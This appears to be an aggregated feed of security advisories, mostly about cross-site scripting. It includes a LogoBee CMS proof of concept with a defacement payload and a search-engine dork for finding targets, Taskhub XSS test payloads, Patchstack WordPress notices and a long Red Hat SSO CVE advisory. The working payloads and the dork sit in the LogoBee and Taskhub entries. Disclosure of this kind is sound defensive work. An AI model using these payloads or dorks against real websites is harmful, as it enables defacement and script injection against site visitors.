LogoBee CMS version 0.2 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : LogoBee CMS v0.2 XSS Vulnerability                                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://logobee.com                                                                                                |  | # Dork      : intext:''Logo & Web Design by LogoBee''                                                                            |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : /updates.php?id=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+]  http://vaxform127.0.0.1/updates.php?id=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

LogoBee CMS 0.2 Cross Site Scripting

Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Xtemos WoodMart plugin <= 7.2.4 versions.

**Solution**

 Fixed

Update the WordPress WoodMart theme to the latest available version (at least 7.2.5).

Found this useful? Thank Rafie Muhammad (Patchstack) for reporting this vulnerability. Buy a coffee ☕

Rafie Muhammad (Patchstack) discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress WoodMart Theme. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 7.2.5.

**Other vulnerabilities in this theme**

 0 present

 5 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-41872: WordPress Woodmart theme <= 7.2.4 - Reflected Cross Site Scripting (XSS) vulnerability - Patchstack

Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Tyche Softwares Order Delivery Date for WooCommerce plugin <= 3.20.0 versions.

**Solution**

 Fixed

Update the WordPress Order Delivery Date for WooCommerce plugin to the latest available version (at least 3.20.1).

Phd discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Order Delivery Date for WooCommerce Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 3.20.1.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-41874: WordPress Order Delivery Date for WooCommerce plugin <= 3.20.0 - Reflected Cross Site Scripting (XSS) vulnerability - Patchstack

Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Christoph Rado Cookie Notice & Consent plugin <= 1.6.0 versions.

**Solution**

 Fixed

Update the WordPress Cookie Notice & Consent plugin to the latest available version (at least 1.6.1).

DoYeon Park (p6rkdoye0n) discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Cookie Notice & Consent Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 1.6.1.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-41948: WordPress Cookie Notice & Consent plugin <= 1.6.0 - Cross Site Scripting (XSS) vulnerability - Patchstack

Auth. (admin+) Cross-Site Scripting (XSS) vulnerability in Avirtum iFolders plugin <= 1.5.0 versions.

**Solution**

 Fixed

Update the WordPress iFolders plugin to the latest available version (at least 1.5.1).

emad discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress iFolders Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 1.5.1.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-41949: WordPress iFolders plugin <= 1.5.0 - Cross Site Scripting (XSS) vulnerability - Patchstack

The Contact Form by FormGet plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'formget' shortcode in versions up to, and including, 5.5.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVE-2023-5125: index.php in formget-contact-form/trunk – WordPress Plugin Repository

Taskhub version 2.8.8 suffers from a cross site scripting vulnerability.

    ## Title: TASKHUB-2.8.8-XSS-Reflected## Author: nu11secur1ty## Date: 09/22/2023## Vendor: https://codecanyon.net/user/infinitietech## Software: https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874## Reference: https://portswigger.net/web-security/cross-site-scripting## Description:The value of the JSON parameter within the project parameter is copiedinto the HTML document as plain text between tags. The payloadvn5mr<img src=a onerror=alert(1)>i62kl was submitted in the JSONparameter within the project parameter. This input was echoedunmodified in the application's response. The already authenticated(by using a USER ACCOUNT)attacker can get a CSRF token and cookiesession it depends on the scenarios.STATUS: HIGH Vulnerability[+]Test exploit:```surw7%3Cscript%3Ealert(1)%3C%2fscript%3E```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/infinitietech/TASKHUB-2.8.8)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/09/taskhub-288-xss-reflected.html)## Time spent:01:10:00

Taskhub 2.8.8 Cross Site Scripting

A flaw was found in Red Hat Single Sign-On for OpenShift container images, which are configured with an unsecured management interface enabled. This flaw allows an attacker to use this interface to deploy malicious code and access and modify potentially sensitive information in the app server configuration.

Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   OpenShift Dev Spaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Quarkus

**Integration and Automation**

All Products

Issued:

2023-03-01

Updated:

2023-03-01

**RHSA-2023:1047 - Security Advisory**

*   Overview

**Synopsis**

Important: Red Hat Single Sign-On 7.6.2 for OpenShift image security and enhancement update

**Type/Severity**

Security Advisory: Important

**Topic**

A new image is available for Red Hat Single Sign-On 7.6.2, running on Red  
Hat OpenShift Container Platform from the release of 3.11 up to the release  
of 4.12.0.  

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

Red Hat Single Sign-On is an integrated sign-on solution, available as a  
Red Hat JBoss Middleware for OpenShift containerized image. The Red Hat  
Single Sign-On for OpenShift image provides an authentication server that  
you can use to log in centrally, log out, and register. You can also manage  
user accounts for web applications, mobile applications, and RESTful web  
services.  

*   snakeyaml: Constructor Deserialization Remote Code Execution (CVE-2022-1471)
*   keycloak: path traversal via double URL encoding (CVE-2022-3782)
*   RH-SSO for OpenShift images: unsecured management interface exposed to adjacent network (CVE-2022-4039)
*   snakeyaml: Denial of Service due to missing nested depth limitation for collections (CVE-2022-25857)
*   moment: inefficient parsing algorithm resulting in DoS (CVE-2022-31129)
*   sshd-common: mina-sshd: Java unsafe deserialization vulnerability (CVE-2022-45047)
*   CXF: Apache CXF: SSRF Vulnerability (CVE-2022-46364)
*   keycloak: keycloak: user impersonation via stolen uuid code (CVE-2023-0264)
*   bootstrap: Cross-site Scripting (XSS) in the collapse data-parent attribute (CVE-2018-14040)
*   rcue-bootstrap: bootstrap: Cross-site Scripting (XSS) in the data-container property of tooltip (CVE-2018-14042)
*   jquery: Prototype pollution in object's prototype leading to denial of service, remote code execution, or property injection (CVE-2019-11358)
*   jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method (CVE-2020-11022)
*   keycloak: glob-parent: Regular Expression Denial of Service (CVE-2021-35065)
*   keycloak: minimist: prototype pollution (CVE-2021-44906)
*   keycloak: missing email notification template allowlist (CVE-2022-1274)
*   keycloak: XSS on izmpersonation under specific circumstances (CVE-2022-1438)
*   keycloak: Session takeover with OIDC offline refreshtokens (CVE-2022-3916)
*   Moment.js: Path traversal in moment.locale (CVE-2022-24785)
*   loader-utils: loader-utils:Regular expression denial of service (CVE-2022-37603)
*   snakeyaml: Uncaught exception in org.yaml.snakeyaml.composer.Composer.composeSequenceNode (CVE-2022-38749)
*   snakeyaml: Uncaught exception in org.yaml.snakeyaml.constructor.BaseConstructor.constructObject (CVE-2022-38750)
*   snakeyaml: Uncaught exception in java.base/java.util.regex.Pattern$Ques.match (CVE-2022-38751)
*   jettison: parser crash by stackoverflow (CVE-2022-40149)
*   jettison: memory exhaustion via user-supplied XML or JSON data (CVE-2022-40150)
*   jettison: If the value in map is the map's self, the new new JSONObject(map) cause StackOverflowError which may lead to dos (CVE-2022-45693)
*   json5: Prototype Pollution in JSON5 via Parse Method (CVE-2022-46175)
*   jackson-databind: deep wrapper array nesting wrt UNWRAP\_SINGLE\_VALUE\_ARRAYS (CVE-2022-42003)
*   jackson-databind: use of deeply nested arrays (CVE-2022-42004)
*   CXF: Apache CXF: directory listing / code exfiltration (CVE-2022-46363)
*   undertow: DoS can be achieved as Undertow server waits for the LAST\_CHUNK forever for EJB invocations (CVE-2022-2764)
*   keycloak: Client Registration endpoint does not check token revocation (CVE-2023-0091)

This erratum releases a new image for Red Hat Single Sign-On 7.6.2 for use  
within the Red Hat OpenShift Container Platform (from the release of 3.11  
up to the release of 4.12.0) cloud computing Platform-as-a-Service (PaaS)  
for on-premise or private cloud deployments, aligning with the standalone  
product release.

**Solution**

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.  

For details on how to apply this update, refer to:  

https://access.redhat.com/articles/11258

**Affected Products**

*   Red Hat OpenShift Container Platform 4.10 for RHEL 8 x86\_64
*   Red Hat OpenShift Container Platform 4.9 for RHEL 8 x86\_64
*   Red Hat OpenShift Container Platform for Power 4.10 for RHEL 8 ppc64le
*   Red Hat OpenShift Container Platform for Power 4.9 for RHEL 8 ppc64le
*   Red Hat OpenShift Container Platform for IBM Z and LinuxONE 4.10 for RHEL 8 s390x
*   Red Hat OpenShift Container Platform for IBM Z and LinuxONE 4.9 for RHEL 8 s390x

**Fixes**

*   BZ - 1601614 - CVE-2018-14040 bootstrap: Cross-site Scripting (XSS) in the collapse data-parent attribute
*   BZ - 1601617 - CVE-2018-14042 bootstrap: Cross-site Scripting (XSS) in the data-container property of tooltip
*   BZ - 1701972 - CVE-2019-11358 jquery: Prototype pollution in object's prototype leading to denial of service, remote code execution, or property injection
*   BZ - 1828406 - CVE-2020-11022 jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method
*   BZ - 2031904 - CVE-2022-1438 keycloak: XSS on impersonation under specific circumstances
*   BZ - 2066009 - CVE-2021-44906 minimist: prototype pollution
*   BZ - 2072009 - CVE-2022-24785 Moment.js: Path traversal in moment.locale
*   BZ - 2073157 - CVE-2022-1274 keycloak: HTML injection in execute-actions-email Admin REST API
*   BZ - 2105075 - CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS
*   BZ - 2117506 - CVE-2022-2764 Undertow: DoS can be achieved as Undertow server waits for the LAST\_CHUNK forever for EJB invocations
*   BZ - 2126789 - CVE-2022-25857 snakeyaml: Denial of Service due to missing nested depth limitation for collections
*   BZ - 2129706 - CVE-2022-38749 snakeyaml: Uncaught exception in org.yaml.snakeyaml.composer.Composer.composeSequenceNode
*   BZ - 2129707 - CVE-2022-38750 snakeyaml: Uncaught exception in org.yaml.snakeyaml.constructor.BaseConstructor.constructObject
*   BZ - 2129709 - CVE-2022-38751 snakeyaml: Uncaught exception in java.base/java.util.regex.Pattern$Ques.match
*   BZ - 2135244 - CVE-2022-42003 jackson-databind: deep wrapper array nesting wrt UNWRAP\_SINGLE\_VALUE\_ARRAYS
*   BZ - 2135247 - CVE-2022-42004 jackson-databind: use of deeply nested arrays
*   BZ - 2135770 - CVE-2022-40150 jettison: memory exhaustion via user-supplied XML or JSON data
*   BZ - 2135771 - CVE-2022-40149 jettison: parser crash by stackoverflow
*   BZ - 2138971 - CVE-2022-3782 keycloak: path traversal via double URL encoding
*   BZ - 2140597 - CVE-2022-37603 loader-utils:Regular expression denial of service
*   BZ - 2141404 - CVE-2022-3916 keycloak: Session takeover with OIDC offline refreshtokens
*   BZ - 2143416 - CVE-2022-4039 rhsso-operator: unsecured management interface exposed to adjecent network
*   BZ - 2145194 - CVE-2022-45047 mina-sshd: Java unsafe deserialization vulnerability
*   BZ - 2150009 - CVE-2022-1471 SnakeYaml: Constructor Deserialization Remote Code Execution
*   BZ - 2155681 - CVE-2022-46363 Apache CXF: directory listing / code exfiltration
*   BZ - 2155682 - CVE-2022-46364 Apache CXF: SSRF Vulnerability
*   BZ - 2155970 - CVE-2022-45693 jettison: If the value in map is the map's self, the new new JSONObject(map) cause StackOverflowError which may lead to dos
*   BZ - 2156263 - CVE-2022-46175 json5: Prototype Pollution in JSON5 via Parse Method
*   BZ - 2156324 - CVE-2021-35065 glob-parent: Regular Expression Denial of Service
*   BZ - 2158585 - CVE-2023-0091 keycloak: Client Registration endpoint does not check token revocation
*   BZ - 2160585 - CVE-2023-0264 keycloak: user impersonation via stolen uuid code

**CVEs**

*   CVE-2018-14040
*   CVE-2018-14042
*   CVE-2019-11358
*   CVE-2020-11022
*   CVE-2021-35065
*   CVE-2021-44906
*   CVE-2022-1274
*   CVE-2022-1438
*   CVE-2022-1471
*   CVE-2022-2764
*   CVE-2022-3782
*   CVE-2022-3916
*   CVE-2022-4039
*   CVE-2022-24785
*   CVE-2022-25857
*   CVE-2022-31129
*   CVE-2022-37603
*   CVE-2022-38749
*   CVE-2022-38750
*   CVE-2022-38751
*   CVE-2022-40149
*   CVE-2022-40150
*   CVE-2022-40303
*   CVE-2022-40304
*   CVE-2022-42003
*   CVE-2022-42004
*   CVE-2022-45047
*   CVE-2022-45693
*   CVE-2022-46175
*   CVE-2022-46363
*   CVE-2022-46364
*   CVE-2022-47629
*   CVE-2023-0091
*   CVE-2023-0264
*   CVE-2023-21835
*   CVE-2023-21843

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

CVE-2022-4039

Roundcube before 1.4.14, 1.5.x before 1.5.4, and 1.6.x before 1.6.3 allows XSS via text/plain e-mail messages with crafted links because of program/lib/Roundcube/rcube_string_replacer.php behavior.

Published: 15 September 2023

*   Tags:
*   releases
*   updates
*   security

We just published a security update to the version 1.6 of Roundcube Webmail. It provides a fix to a recently reported XSS vulnerability:

*   Fix cross-site scripting (XSS) vulnerability in handling of linkrefs in plain text messages, reported by Niraj Shivtarkar.

See the full changelog in the release notes in the release notes on the Github download page.

We strongly recommend to update all productive installations of Roundcube 1.6.x with this new version.

Return to News overview

CVE-2023-43770: Security update 1.6.3 released

The Media Library Assistant plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'mla_gallery' shortcode in versions up to, and including, 3.10 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

Tag

#xss